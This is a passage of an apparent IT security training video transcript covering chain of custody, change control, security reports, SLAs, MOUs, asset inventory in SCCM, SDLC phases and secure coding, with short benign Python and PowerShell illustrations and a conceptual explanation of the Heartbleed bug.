especially if it's going to be stored for the long term and perhaps called up in the future. A Faraday bag once
again can be used to store evidence. We also must log any movement of that evidence between different
storage locations down to the minute in terms of tracking date and time.
We should also make sure that we keep evidence away from magnetic fields. Some evidence such as that on a
traditional hard disk drive is susceptible to being wiped or data being damaged or destroyed from strong
magnetic fields. Climate controlled storage rooms are normally used to store evidence. We should also
consider the fact that some items, for example, a laptop that might have been seized during an investigation,
have internal batteries such as a CMOS battery that keeps the date and time, and that battery does run out eventually.
So, whether it takes 5 years or 10 years or 12 years, it will eventually no longer supply power to keep
track of the date and time on that local machine. So we have to keep that in mind as well when it comes to some
electronic equipment. On the screen, you'll see a sample of a chain of custody form. And it includes things
such as a case number – if it's being used in legal proceedings – the offense type for seized equipment, the first
responder's identifying information, the suspect's identifying information, date and time, and the location the data
was gathered or seized. Now we might also have labeling information and so on and so forth. Now, whenever
this evidence is released or received – so if someone is taking it out to use it or putting it back into
storage – all of this has to be logged with detailed comments. In this video, we discussed the chain of custody
form.
[Topic title: Change Control Processes. The presenter is Dan Lachance.] Change is normally good. But
sometimes, in the IT world, changes can cause more problems than they might solve. In this video, we'll talk
about the change control process. The change control process is a structured approach to IT system change.
Changes then are made in a controlled manner. And changes are all documented. Now, by documenting
anything that changes over time, we are facilitating troubleshooting because if changes are made, for instance,
to the configuration of a network service on a file server and no one has documented that change, only the
person that made the change knows it happened.
And it could change the behavior of how things are presented out on the network. And it could cause problems.
And, if we don't have that information when we're troubleshooting, it takes much longer to arrive at a resolution.
The change control process is certainly related to remediation where we might change a flawed configuration,
for example, that exposes a vulnerability. So think, for instance, of a network where we might have numerous
Windows computers that have remote desktop enabled.
And we may want to disable it because we either don't need that type of remote control solution or we're using
something else. So, using a change control process, we can go through the proper channels and procedures to
put our setting into effect to disable remote desktop. Proposing a change means that we have to identify benefits that
will be realized as a result of the change. We have to determine the impact that the change would have on the
network. So, for example, disabling remote desktop would arguably decrease the attack surface unless, of
course, there's another remote control solution being put in its place.
Then, of course, comes the implementation details where we have to deal with the cost, any system downtime
that results from implementing a change. And that doesn't always happen, but it could in some cases. And also
a timeline for when the change could be expected to be fully in effect. So we need to document the change
procedure and the results.
Organizations will normally use either a physical or more often than not a digital change request form that
technicians must fill in and send off for approval. It's a formal document detailing the requested change. And,
after management approval, the change can proceed. The change log is an audit trail of related activities. And, in
order for a change log to be meaningful, everybody has to be using their own unique user accounts so that
things are tracked and people are therefore accountable.
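As a minimal sketch of a change request record – the field names are illustrative assumptions rather than any particular product's schema – a Python structure might look like this:

from dataclasses import dataclass, field
from datetime import datetime, timezone

# Illustrative change request record; approval is set only after management sign-off.
@dataclass
class ChangeRequest:
    requested_by: str
    device: str
    description: str
    expected_benefit: str
    approved: bool = False
    submitted_at: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())

cr = ChangeRequest("dlachance", "WIN10-HR-07", "Disable Remote Desktop", "Reduced attack surface")
cr.approved = True   # recorded once approval is received
print(cr)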
Part of the change control process also includes monitoring the behavior post change. It's usually not good
enough to implement a change after having gone through the proper procedures and then just saying we're
ready to go. The change is good. There are no negative effects. You need to monitor it. And how long you
should monitor it is up for debate. It depends on the nature of the change and the organization's policies. But
we want to make sure that the change results in improvements and doesn't degrade anything.
Examples of things that are affected by a change control process include the approval of software updates.
Now there's a great example of where normally, yes, software updates improve things, make things more
stable, add new features, remove security holes. But, in some cases, if you've been doing IT for a long time,
I'm sure you'll agree that in some cases when you apply software updates, it can actually break things or make
some things worse.
Another example that is affected by the change control process is certainly the reconfiguration of firewall rules
or encryption of data at rest or perhaps the containerization or partitioning of smartphones so that we separate
personal apps, settings, and data from corporate apps, settings, and data. In this video, we discussed the change
control process.
In this video, you will determine which type of report provides the best data for a specific situation.
Objectives
determine which type of report provides the best data for a specific situation
[Topic title: Types of Reports. The presenter is Dan Lachance.] In this video, we'll talk about different types
of reports.
Reports can come from a variety of sources as related to IT management and security management. And, of
course, having different reports can support decision-making for decision-makers. Now, in some cases, there
might be requirements for report retention. For instance, we might have to keep report information
related to security breaches for a certain period of time by law. It's always important to be able to authenticate
the data that is used to generate reports. Is it trustworthy?
So often that means that it must be stored and transmitted in an encrypted format and have limited access to it.
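As a minimal sketch of authenticating report data – assuming Python and an HMAC signature, with the key hard-coded here purely for illustration (a real deployment would use a protected key store) – it might look like this:

import hashlib
import hmac

# The shared secret would normally come from a protected key store.
SECRET_KEY = b"example-not-a-real-key"

def sign_report(report_bytes):
    return hmac.new(SECRET_KEY, report_bytes, hashlib.sha256).hexdigest()

def verify_report(report_bytes, signature):
    # Constant-time comparison avoids leaking information through timing.
    return hmac.compare_digest(sign_report(report_bytes), signature)

report = b"Weekly malware summary: 0 detections"
sig = sign_report(report)
print("Report authentic:", verify_report(report, sig))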
Reports can be generated manually. So, for example, we can run an on-demand report perhaps to check to see
how many machines meet a certain security condition or not, and that could be done as needed. But it can also
be automated. So we could have a schedule basis whereby perhaps at the end of every week, a report of the
latest malware infections is sent to the administrative team.
There could also be triggered reports that are triggered by a certain event that occurs. And that might be related
to an intrusion detection or prevention system. And then there is the SIEM option. SIEM stands for security
information and event management. Essentially, it's a centralized monitoring management solution for larger
networks. Standard report types include things such as general user activity either on a single host or over the
network, system downtime, configuration changes, log event correlation to tie events together, helpdesk
tickets, network traffic in and out. And this is just a tiny sampling of standard report types.
Security report types would include things such as privilege use. So, when users are exercising a privilege – for
example, the right to reboot a server – we might want to track that and then report against it. Unauthorized attempts to
access data; malware detections – always very important; brute-force password attacks; even excessive
network traffic from a host is suspicious and again that might be picked up by your intrusion detection sensors
and you might get a notification as a result. Remember that intrusion prevention differs from detection in that it
can stop a suspicious activity from continuing.
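As a minimal sketch of one such security report – counting failed logons per source to flag possible brute-force attempts, using hypothetical pre-parsed log entries and an arbitrary threshold – a Python example might look like this:

from collections import Counter

# Hypothetical pre-parsed log entries: (source_ip, event) tuples.
events = [
    ("10.0.0.8", "failed_login"), ("10.0.0.8", "failed_login"),
    ("10.0.0.8", "failed_login"), ("10.0.0.8", "failed_login"),
    ("10.0.0.8", "failed_login"), ("192.168.1.20", "failed_login"),
]

THRESHOLD = 5   # arbitrary example threshold per reporting window

failures = Counter(ip for ip, event in events if event == "failed_login")
suspects = {ip: count for ip, count in failures.items() if count >= THRESHOLD}
print("Possible brute-force sources:", suspects)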
We might also want a report that summarizes incidents that have occurred over a certain time frame. Or, if
we've had a security audit conducted, part of that might include a penetration or vulnerability test or scan. So
we might have reports related to that. Again, reports are important because they support decisions. And often
decision-makers are not the IT technicians working in the trenches so to speak. So they need a higher-level
overview. They need to trust that the data is accurate on which they are basing their decisions. And that data
would be used for reports.
Reports can also be subscribed to in various types of solutions, either on a scheduled basis for individual
reports that are of interest, or perhaps stored in a file or even sent via e-mail. What you're
seeing on the screen now is Microsoft System Center Configuration Manager 2012 R2. [The System Center
Configuration Manager (Connected to S01 - First Site) window is open. The Search tab is open, it includes
various options such as All Objects, Saved Searches, and Close. The window is divided into two sections. The
first section is the navigation pane which at the bottom left contains four tabs named Assets and Compliance,
Software Library, Monitoring, and Administration. The Assets and Compliance tab is selected by default
which includes various nodes such as Overview, User Collections, and Device Collections. The second section
is the content pane, which displays information regarding the selected tab.] Now this tool allows us to manage
a large amount of devices within the enterprise for change management purposes. But it also includes hundreds
of reports. Let's get to that.
So, in the bottom left, in the navigation area, I'm going to switch over to the Monitoring area. And then, in the
left-hand navigator, I'm going to expand Reporting [He clicks the Monitoring tab which includes various
nodes such as Overview, Reporting, and System Status. He clicks the Reports subnode under Reporting
node.] where I can also expand Reports to see numerous categories of Reports. [The Reports subnode includes
various folders such as Administrative Security, Alerts, and Asset Intelligence.] For instance, I see an Alerts
category where if I select that report folder on the left, I'll see the reports on the right. [In the content
pane.] And, as we keep going further and further down, we're going to see all the different types of reports.
But, of course, we could search for them.
So, if I just click on Reports on the left and then click the Search bar on the right, if I wanted to, I might search
for malware. And here we have some various malware reports that might be of interest, such as Antimalware
activity report. So I could right-click on it, [He right-clicks the Antimalware activity report. As a result, a
flyout appears which includes various options such as Run, Edit, and Create Subscription.] choose to Run the
report. [The Antimalware activity report dialog box appears. In the dialog box, the following Report
Description is highlighted: The report shows an overview of antimalware activity.] Now some reporting
solutions will have parameters, in other words, you have to supply further information on which the report will
run. For example, that might include a date and time range.
Now, when we run a report, we might view it on screen. We might be able to print it. We might be able to save
it in a variety of different file formats. So here this Antimalware activity report has a Start Date and an End
Date, so there's a time frame. [The Antimalware activity report has two sections. The first section contains a
text box and two drop-down boxes. And there is also a View Report button adjacent to them. The Collection
Name text box contains a hyperlink named Values adjacent to it. In Start Date drop-down box, 8/19/2016 is
selected by default. And in End Date drop-down box, 8/26/2016 is selected by default. The second section is
blank. He clicks the Values hyperlink. As a result, Parameter Value dialog box opens which contains a Filter
field and below that three options: Collection Name, All Systems, and Windows 7 Devices. At the bottom of the
dialog box are OK and Cancel buttons.] But it also has a collection of devices that it must be based on. So
here I'm going to choose the All Systems collection. I'll click OK. Then I'll click the View Report button. And
then the report results will show up down below. [In the second section of the dialog box.]
Now this is one of those types of reports where no news is good news. We have zero antimalware activity.
That's a good thing. But notice here [At the top of the second section are various tools such as Print, Print
Layout, Page Setup, and Save drop-down list box.] that we've got options to Print. We also have various
options to control the Print Layout and we also can save the report in various file formats, [The Save drop-
down list box includes various options such as PDF, Excel, and Word.] perhaps as a PDF that we would
manually attach to an e-mail and send off to our IT manager and so on. [He closes the Antimalware activity
report dialog box.] But, on the automation side, we can also right-click on a report and we can Create
Subscription to it.
[The Create Subscription Wizard opens. The wizard is divided into two sections. The first section includes
various options such as Subscription Delivery and Summary. The Subscription Delivery option is selected by
default. The second section is the content pane which includes various text boxes and drop-down list
boxes.] Now subscribing to a report means you find that report interesting and you might even want to
schedule how often the report runs and you get a copy. So the report could be delivered in this specific
example to a Windows File Share, or it could be sent through E-mail [In the second section, the Report
delivered by drop-down list box contains two options, Windows File Share and E-mail. He selects the E-mail
option. As a result, various text boxes, drop-down list boxes, and checkboxes appear. The text boxes contain
To, Cc, Bcc, Reply-To, Subject, Comment, and Description. The drop-down list boxes contain Priority in
which Normal is selected by default and Render Format in which XML file with report data is selected by
default. There are two checkboxes named Include Link and Include Report under Description text box. At the
bottom of the wizard are four buttons named Previous, Next, Summary, and Cancel.] to interested parties
where we can include a link to the report or actually include a copy of the report, [He selects the Include
Report checkbox.] for example, here in (Acrobat) PDF format. [He clicks the Render Format drop-down list
box which includes various options such as XML file with report data, Acrobat (PDF) file, and Excel. He
selects Acrobat (PDF) file option.]
So, as we go through with this, we can continue to configure things like the schedule. So I'm just going to put
here [He types [email protected] in the To text box.] [email protected]. This is the e-mail
recipient group. And the Subject is going to be Malware Report. Now, when I click the Next button down at
the bottom, [He clicks the Next button. As a result, Subscription Schedule suboption is selected under the
Subscription Delivery option. There are two radio buttons named Use shared schedule, adjacent to that is a
drop-down box and Create new schedule which is selected by default. The Create new schedule contains radio
buttons such as Hourly, Daily, Weekly, Monthly, and Once. He selects the Weekly radio button which includes
various checkboxes such as Mon, Tues, and Sun. There are two fields to set Start time and Begin on, and a
checkbox named Stop on. The Start time is set to 02:03PM. The Begin on is set to 8/26/2016. The Stop on
checkbox is not selected.] then I can determine what the schedule is going to be – should it run Weekly,
Monthly, and so on.
[Topic title: Service Level Agreement. The presenter is Dan Lachance. The Amazon EC2 SLA web page is
open. The web page is divided into two parts. The first part is the navigation pane which contains PRODUCTS
& SERVICES and RELATED LINKS sections. The PRODUCTS & SERVICES section includes various options
such as Amazon EC2, Pricing, and FAQs. The RELATED LINKS section includes various links such as
Amazon EC2 Dedicated Hosts and Amazon EC2 Spot Instances. The second part is the content pane which is
titled Amazon EC2 Service Level Agreement. It contains various sections such as Last Updated June 1, 2013,
Definitions, Service Commitment, Definitions, Service Commitments and Service Credits, Credit Request and
Payment Procedures, and Amazon EC2 SLA Exclusions.] In this demonstration, we'll take a look at an
example of a Service Level Agreement. The Service Level Agreement or the SLA is a contract between the
provider of a service and a consumer of that same service. Now it doesn't have to exist externally. It could exist
within a larger organization – for instance, the IT department might use it for departmental chargeback
to individual departments that require IT services.
But here we're looking at the Amazon Web Services' EC2 Service Level Agreement. EC2 is the platform in the
Amazon Web Services cloud where we can launch virtual machines. Now a Service Level Agreement has a
number of different sections. Let's take a look at this example one. We're always going to be concerned, of
course, with how recent it is, [He refers to the Last Updated June 1, 2013 section.] so any updates we want to
make sure we're aware of. Then we get down to the definition of terms [He scrolls down to the Definition
section.] – in this case – for the Monthly Uptime Percentage and how those numbers are calculated or derived.
Now here [In the Definition section.] Amazon Web Services is talking about Regional Unavailability or
simply general Unavailability for an Amazon EC2 instance or for its attached disk volumes, which are
EBS volumes. Now they also define the term Service Credit here because what's common with cloud providers
certainly is that if they don't honor or meet the terms in the SLA, one of the consequences from them to the
service consumer – in this context the cloud customer – is service credits given to the customer.
So let's go down and take a look at this a little bit further. So here [In the Service Commitments and Service
Credits section.] we can see the Monthly Uptime Percentage. It says here, if it's Less than 99.95% but equal to
or greater than 99.0%, then we can see the Service Credit Percentage for that specific range, which – in
this case – is 10%. Now, if the Monthly Uptime Percentage is less than 99.0%, then Amazon Web Services in
this case is on the hook for a 30% Service Credit Percentage to the customer.
Now it says here that Service Credits are applied against future Amazon – in this case, EC2 or EBS volume
payments. Now an important part of an SLA is how these consequences are dealt with. In other
words, how do we redeem these credits if we are the consumer and we don't have at least 99% uptime over the
month? So here it talks about the credit request and payment procedures that must be followed. The general
concepts are going to be the same, whether you're looking at Rackspace in the cloud or Microsoft Azure,
Office 365 or in this case, it happens to be Amazon Web Services.
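As a minimal sketch of how those credit tiers might be applied – the tier boundaries mirror the SLA text shown above, while the billing amount is a made-up example – a Python calculation could look like this:

# Tiers taken from the SLA shown above; the billing amount is a hypothetical example.
def service_credit_percent(monthly_uptime):
    if monthly_uptime >= 99.95:
        return 0
    if monthly_uptime >= 99.0:
        return 10
    return 30

monthly_bill = 1000.00   # hypothetical monthly charge
uptime = 99.2
credit = monthly_bill * service_credit_percent(uptime) / 100
print(f"Uptime {uptime}% -> credit of ${credit:.2f} against future charges")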
Then, of course, [He scrolls down to the Amazon EC2 SLA Exclusions section.] there will often be some kind
of listing that excludes certain circumstances from the consequences or from the Service Level Agreement.
Now we don't want to go away thinking that responsibility under the Service Level Agreement lies entirely with
the provider. In the case of cloud computing, it really depends on the specific type of service – for example,
infrastructure as a service, which is what this offering is classified as. Because we're talking about virtual machines, a lot of the
responsibility, at least for configuration and management, is on the consumer. Of course, it's running on
provider equipment, so the provider is responsible for making sure that equipment is up and running. In this video, we took a look
at a sample Service Level Agreement.
After completing this video, you will be able to explain the purpose of a MOU.
Objectives
[Topic title: Memorandum of Understanding. The presenter is Dan Lachance.] Dealing with cybersecurity is
much more than just running the tools and conducting penetration tests. It also includes documentation in the
form of things such as memorandums of understanding. A memorandum of understanding is often referred to
as an MOU. It's an agreement between parties to achieve a common objective. However, it's not legally
binding or enforceable. So therefore, the memorandum of understanding is less formal than a contract or a
service-level agreement. The MOU is written and it will consist of items such as an offer, acceptance, the
intention of the document, and additional considerations between the two parties.
A memorandum of agreement is referred to as an MOA. Now this, as opposed to an MOU, is legally binding
and enforceable. It's an agreement between parties, again, to achieve a common objective and it can be verbal or
written. An MOA consists of an offer and acceptance. Now there are many similarities, of course, between
both the memorandum of understanding and the memorandum of agreement. Both of them share a common
objective that both parties strive for. It is a structured approach to meeting shared objectives. And it involves at
least two parties if not more.
The service-level agreement is different. The SLA is a contract between a provider and consumer of a service
where there are things like performance expectations, response times that must be met, and also consequences.
So there could be some kind of a monetary penalty or a credit penalty where, for instance, if a cloud provider
doesn't provide the uptime that they promised in the SLA, then the cloud customer gets credits towards the
next month's cloud computing charges. In this video, we discussed a memorandum of understanding.
10. Video: Asset Inventory (it_cscybs_05_enus_10)
In this video, find out how to use existing inventory to drive security-related decisions.
Objectives
[Topic title: Asset Inventory. The presenter is Dan Lachance.] In this video, I'll demonstrate how to work with
asset inventory.
Organizations can classify many different types of assets including personnel, equipment, IT systems, data,
and so on. Here we're talking about asset inventory for computing devices. And, instead of going around and
gathering that physically and manually, there are many centralized enterprise-class automated ways to gather
inventory.
[The System Center Configuration Manager (Connected to S01 - First Site) window is open. Running along
the top of the page there are three tabs named Home, Collection, and Close. The Collection tab is open by
default, it includes various options such as Add Selected Items, Install Client, and Properties. The window is
divided into two sections. The first section is the navigation pane which at the bottom left contains four tabs
named Assets and Compliance, Software Library, Monitoring, and Administration. The Assets and
Compliance tab is selected by default which includes various nodes such as Overview, Devices, and Device
Collections. The Toronto Devices subnode is selected by default under Devices node. The second section is the
content pane, which contains two subsections.] Here, in Microsoft System Center Configuration Manager or
SCCM, we can go to the Assets and Compliance workspace which I've already clicked on in the bottom left.
On the left, we can then view our Devices. Now here managed devices will be listed under the Client
column [He clicks the Devices node. As a result, a table with column headers titled Icon, Name, Client, Site
Code, and Client Activity is displayed. The column header Name includes various entries such as 192.168.1.1,
CM001, WIN10, and WIN7.] with the value of Yes. For instance, here I've got a WIN10 computer and if I
right-click on it, [He right-clicks the WIN10 and a shortcut menu appears which includes various options such
as Add Selected Items, Start, and Block. He clicks the Start option and a flyout appears which includes
Resource Explorer and Remote Control options.] I can choose Start and I can then click on the Resource
Explorer option to open up an area. [The System Center Configuration Manager - Resource Explorer window
is open. The window is divided into two sections. The first section contains a node named WIN10 and three
subnodes named Hardware, Hardware History, and Software. The second section is the content pane.] I'll just
maximize that window where I can view any inventory to Hardware related to that specific machine. [He
clicks the Hardware subnode and various hardware items are displayed in the content pane. And then he expands
the Hardware subnode which further includes various subnodes such as Installed Software, Memory, and
Motherboard.]
So, instead of going to that machine or remote controlling it to find out things, such as Installed Software,
Memory, Motherboard details, and so on, instead I can centrally view it here. Now, not only can I view things
like Hardware inventory, but if it's been configured, I'll also be able to view any Software inventory. [He
clicks the Software subnode which includes various subnodes such as Collected Files and Product Details.
The Product Details contains further subsections named Microsoft Corporation and Microsoft Inc.] Now what
this will show me is any scanned software, categorized by company – in this case, Microsoft
Corporation.
But I can also expand the list and view other product details and vendor solutions for software that are installed
on our machine. Now again, this inventory could be very relevant. If I want to deploy a new patch or another
piece of software, it might require that an existing piece of software already be out there. Now, in the same
way, here in the SCCM tool, what I could also do on the left is go to the Monitoring workspace [He clicks the
Monitoring tab which includes various nodes such as Overview, Reporting, and System Status. He clicks the
Reports subnode under Reporting node. The Reports subnode includes various folders such as Hardware -
General and Software - Companies and Products.] where I can then run Reports based on my inventoried
assets.
So, for instance, if we were to scroll down to the hardware section, we would see that we could choose, for
instance, from the Hardware - General category, [He clicks the Hardware - General folder. As a result, a table
is displayed in the content pane with column headers such as Icon, Name, Category, and Date Modified. There
are five rows under the Name column header such as Computer Information for a specific computer and Dan
CustomReport1.] a "Computer information for a specific computer" type of report and we could right-click
and Run the report or Create Subscription to it, for example, if we want this mailed to us automatically on a
periodic basis. So there are other ways to also take a look at our assets in terms of software that has been
inventoried.
So, if I were to go to the Software - Companies and Products folder on the left, I would see numerous reports
over on the right, such as, for instance, the report called "Count inventoried products and versions for a
specific product". Now the other thing about asset inventory, in the case of computing devices in this particular
tool as well, is that under the Assets and Compliance workspace, I could now build a new device collection. So
I'll right-click on the Device Collections link in the left-hand navigator [He right-clicks the Device Collections
node. As a result, a shortcut menu appears which includes Create Device Collection and Import Collections
options.] to choose Create Device Collection. [The Create Device Collection Wizard is open. The wizard is
divided into two sections. The first section contains options such as General, Membership Rules,
Summary, Progress, and Completion. The General option is selected by default. The second section is the
content pane which includes three text boxes such as Name, Comment, and Limiting collection. In the Name
text box, Test is written. The Comment text box is blank. The Limiting collection text box is blank and adjacent
to that is a Browse button. At the bottom of the page are four button named Previous, Next, Summary, and
Cancel.] We're going to call this Test and for the Limiting collection, I'll click Browse and choose All
Systems [The Select Collection dialog box opens. The dialog box has two sections. The first section contains a
drop-down list box in which Device Collections is selected by default and a node named Root which is selected
by default. The second section contains a table with column headers Name and Member Count. The entries
under Name header are All Desktop and Server Clients, All Mobile Devices, All Systems, and All Unknown
Computers. He clicks the All Systems with 7 Member Count. At the bottom of the dialog box are OK and
Cancel buttons. He clicks the OK button.] as a starting point and I'll click Next.
Then, [He clicks the Membership Rules option on the Create Device Collection Wizard. The content pane
includes a table with column headers named Rule Name, Type, and Collection ID. Under the table there is an
Add Rule drop-down list box which includes Direct Rule and Query Rule options. There are two checkboxes
below that named Use incremental updates for this collection and Schedule a full update on this collection.
The Schedule a full update on this collection checkbox is selected by default.] on the Add Rule button on the
next screen of the wizard, I'm going to choose a Query Rule. And I'm going to call this Query1. And then I'll
choose Edit Query Statement. [He clicks the Query Rule option from the drop-down box. As a result, Query
Rule Properties dialog box appears where in the General tab there are two text boxes and a drop-down box.
In the Name text box, he types Query1. Below that there is an Import Query Statement button. In the Resource
class drop-down box, System Resource is selected by default. Below that there is an Edit Query Statement
button. In the Query Statement text box, select * from SMS_R_System is written by default. At the bottom of the
dialog box are OK and Cancel buttons. He clicks the Edit Query Statement button. As a result, Query
Statement Properties dialog box opens which contains three tabs named General, Criteria, and Joins.] Now
the point here is that if we've got asset inventory already done in terms of hardware and software for
computing devices, then it really lends itself quite nicely to building collections of computers based on that
gathered inventory. For example, if I were to go to the Criteria tab then click the new criteria button for Simple
value, [The Criterion Properties dialog box opens. In the Criterion Type drop-down list box, Simple value is
selected by default. Below that there is a Where text box which is blank and under that there is a Select button.
The Operator drop-down list box is blank and under that there is a Value text box which is blank and a Value
button. He clicks the Select button.] I'm going to click the Select button.
And, if we take a look here [The Select Attribute dialog box is open. The dialog box contains Attribute class,
Alias as, and Attribute drop-down list boxes. He clicks the Attribute class drop-down list box. As a result, a list
appears which includes various classes such as 1394 Controller Extended History, Antimalware Health
Status, AutoStart Software, BitLocker, Desktop Monitor, and Disk Partitions.] at this list of attribute classes,
look at all the different things that we could build a new collection of devices based on – Antimalware Health
Status, any AutoStart Software, whether BitLocker is configured in a certain manner on the machine, we go
further down, even the type of Desktop Monitor that's being run, even the number of Disk Partitions can be
queried, and so on.
So, once we've got asset inventory automated from a central location, it supports decision-making. We can run
reports and it facilitates other IT functions such as building device collections containing only devices that
have certain characteristics.
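As a minimal sketch of using gathered inventory to drive a decision – the records below are hypothetical stand-ins for data a tool such as SCCM would collect – filtering devices by a characteristic might look like this in Python:

# Hypothetical inventory records; in practice these would come from an inventory tool.
inventory = [
    {"name": "WIN10", "bitlocker_enabled": True,  "software": ["Office", "7-Zip"]},
    {"name": "WIN7",  "bitlocker_enabled": False, "software": ["Office"]},
    {"name": "CM001", "bitlocker_enabled": True,  "software": ["SQL Server"]},
]

# Build a "collection" of devices that lack BitLocker, much like a query-based device collection.
needs_attention = [d["name"] for d in inventory if not d["bitlocker_enabled"]]
print("Devices without BitLocker:", needs_attention)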
Table of Contents
[Topic title: SDLC Phases. The presenter is Dan Lachance.] In this video, I'll talk about the systems
development life cycle. The systems development life cycle is often referred to as the SDLC. It serves as a
framework with multiple phases that are used to manage complex projects. When developing IT solutions, we can
also follow secure coding practices such as those published by OWASP, the Open Web Application
Security Project, recommendations from the SANS Institute, and guidance from the Center for Internet Security,
which provides system design recommendations and even benchmarks. Let's take a look at each phase of the
system development life cycle, beginning with project initiation where the business need is clearly defined
since our solution must address it. After which we then take a look at risk assessments, we assemble a project
team, and we think about the type of data that our solution will deal with – whether it be intellectual property,
Personally Identifiable Information or some other kind of corporate data.
We then must consider the stakeholders that will be involved whether directly or indirectly, including software
developers, network administrators, management, end users – which could also be customers – and of course
any third party involvement. Next, we must determine the functional requirements of the solution. So based on
the business need, what must it actually do? Is it going to be a mobile device application? Will the solution be
used on premises or in the cloud or within a certain physical office space? Are there any legal or regulatory
compliance issues that we have to adhere to? We also should consider whether the application needs to be
highly available. For instance, if it's a mission critical application that the business depends on.
Then, at this point, we must define the security requirements such as authentication – so the proving of one's
identity, encryption of data at rest, and data being transmitted. And we must also define any requirements to
prevent data loss. So, in other words, the unintended leakage of data to unauthorized parties. Next, we actually
get into the system design specifications such as exactly how the security requirements will be met as related
to authentication, encryption, and data loss prevention. So at this point, we're starting to get into some detail
related to security controls. Then we get into the development and implementation phase where the solution,
for example, might be built in the cloud since these days public cloud providers offer platforms, databases,
virtual machines that could be spun up very quickly to build and test a product – and then they can be
essentially deprovisioned when no longer needed.
So it's very quick to get this development environment. We're only paying for while we're using it. So it might
make more sense to do that instead of building and developing a solution on premises. Part of development and
implementation is also a peer review. So...to make sure that we followed secure coding practices and so on.
However, security really needs to be considered through all SDLC phases, not just development and
implementation. In the documentation phase, there are ongoing updates. There's continuous improvement
where we're always assessing our solution to make sure it addresses business needs and that it also addresses
any threats which are ongoing – they're always changing. We can also use documentation for training, for
example, the on-boarding process for new hires.
Lessons learned can also be derived after incidents occur. So really, documentation should apply to all phases
of the SDLC. In the evaluation and testing portion, we should be doing things like enabling verbose logging to
log all application components. We might even then capture network traffic to ensure that what's being
transmitted is what we expect. We might stress test the solution to see how it behaves. Then we would submit
abnormal data as input – this is often called fuzz testing – to see how the application reacts. We want to make
sure that the application doesn't crash or reveal sensitive information as a result of the submission of the
abnormal data. And of course, we need end user acceptance for the solution.
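As a minimal sketch of fuzz testing – using a toy input handler and random printable strings as the abnormal input; a real target would be your own application's input routine – a Python example might look like this:

import random
import string

# Toy function under test; a real target would be your application's input handler.
def parse_age(value):
    age = int(value)
    if not 0 <= age <= 130:
        raise ValueError("age out of range")
    return age

def random_input(max_len=20):
    return "".join(random.choice(string.printable) for _ in range(random.randint(0, max_len)))

# Feed abnormal input and make sure only the rejection we expect is raised (no crashes or hangs).
for _ in range(1000):
    data = random_input()
    try:
        parse_age(data)
    except ValueError:
        pass   # expected rejection of bad input
    except Exception as exc:
        print("Unexpected failure on input", repr(data), "->", exc)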
In the transitioning to production phase, we have pilot testing, careful observation of the results, and then we
take a look at differences from our production versus our development environment. Despite our best
intentions when testing, sometimes there are variables that just cannot be reproduced in a development or
testing environment. So we have to really observe that in the production environment during the pilot testing.
At the same time, usually what happens is we have to make changes to the documentation, whether it's best
practices for our solution or even core documentation changes based on how it behaves in a production
environment. As with everything, there's ongoing maintenance over time even for the best of solutions, such as
adding user accounts, perhaps making small functional changes as needed, and of course patching problems
that we discover over time. In the end, there is the eventual retirement of our solution. In this video, we
discussed the system development life cycle phases.
[Topic title: Secure Coding. The presenter is Dan Lachance.] In this video, I'll discuss secure coding. One of
the biggest problems with software is the tight timelines under which developers are pressured to deliver a solution. Often, a solution must be put out the door as quickly as possible. And the problem with this is that we can't properly apply security techniques if we're always in a rush. So the first thing we should consider, then,
are best practices related to secure coding, such as those published by OWASP. OWASP is the Open Web
Application Security Project. This is an online resource that has things like secure coding articles,
documentation, and free tools available for developers to use. There's also the SANS Institute, which has a number of whitepapers related to things like secure coding, as well as the Center for Internet Security, which again has a lot of coding and system design recommendations related to security.
But before we can take a look at secure coding best practices, we have to have a clear idea of the security
requirements of the solution that is being built. [The www.sans.org web site opens. The web page includes the
Find Training tab, Live Training tab, Login button, and a search bar. The web page also includes links such
as Secure Authentication on the Internet and Software Engineering - Security as a Process in the SDLC. By
default, in the find result bar, sdlc is written.] Here on the www.sans.org web site, [Dan clicks the down
arrow next to the find result bar and then clicks Software Engineering - Security as a Process in the SDLC
link.] if I were to search for sdlc, the system development life cycle, I can see that there is a Reading Room
document here called Software Engineering – Security as a Process in the SDLC. So, if I were to actually click
on that link and begin reading this documentation, then this would be one of the resources I could use to follow
secure coding practices. And there are many out there on the Internet. [The Software Engineering - Security as
a Process in the SDLC web page opens. The web page includes refresh and download buttons.] So now we
can see the Software Engineering - Security as a Process in the SDLC document loaded here from the SANS
Institute. So this is the type of documentation that we should be going into before we start developing from the
initial phase of the system development life cycle.
[He resumes the explanation of secure coding.] Another invaluable part of secure coding is having a peer
review. This essentially means having other sets of eyes reviewing code, looking for improper secure coding practices or flaws in the code's logic. So therefore, security must be a part of each and every SDLC
phase. A big part of secure coding involves input validation to make sure that the data being fed into an
application is what is expected. We want to make sure that we allocate enough memory to account for valid
data being input. And then, if we're expecting something like a date of birth, we make sure that only dates are
entered into that field before it's processed. We also want to make sure with input validation that we don't
allow executable code to be submitted, for example, on a Web Form field.
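To make that a bit more concrete, here's a minimal sketch of that kind of check in PowerShell. The prompt, the field, and the expected format are just placeholders for illustration, not part of any particular application.

$dateOfBirth = Read-Host 'Enter date of birth (yyyy-MM-dd)'
# First, reject anything that doesn't even look like a date; this also keeps markup,
# script tags, and other executable content out of this field.
if ($dateOfBirth -notmatch '^\d{4}-\d{2}-\d{2}$') {
    Write-Error 'Rejected: a date of birth in the form yyyy-MM-dd is required.'
    return
}
# Then confirm it's a real calendar date (for example, 2020-02-31 would fail here).
try {
    $null = [datetime]::ParseExact($dateOfBirth, 'yyyy-MM-dd', $null)
}
catch {
    Write-Error 'Rejected: that is not a valid calendar date.'
    return
}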
So this is all part of our security requirements definition when we build our solution. As an example of a secure coding problem, consider the Heartbleed bug, which was an SSL/TLS bug. This was specifically an OpenSSL vulnerability that allowed access to data that would normally be secured with SSL and TLS. The problem with the way that OpenSSL was coded – and it has since been fixed – is that it lacked a check comparing the client-specified payload length, in bytes, against the actual size of the data that was transmitted. Now, because this wasn't checked properly on the server side, it resulted in the client being able to read server memory contents beyond what was allocated for the variable containing the client data.
So essentially, an attacker could cause the server to read and return the contents of memory beyond the end of
the submitted packet data. And that, of course, violates secure coding practices. With secure coding, best practices and recommendations will vary from programming language to programming language. So, whether we're scripting using a Unix or a Linux shell of some type, or using Visual Basic or Microsoft PowerShell, or languages like C, C++, Java, and Python, there will be different best practices and recommendations, although there are some common threats. [The Secure Coding Cheat Sheet web page of the www.owasp.org web site is
open. The web page is divided into two sections. The first section contains the navigation pane. The navigation
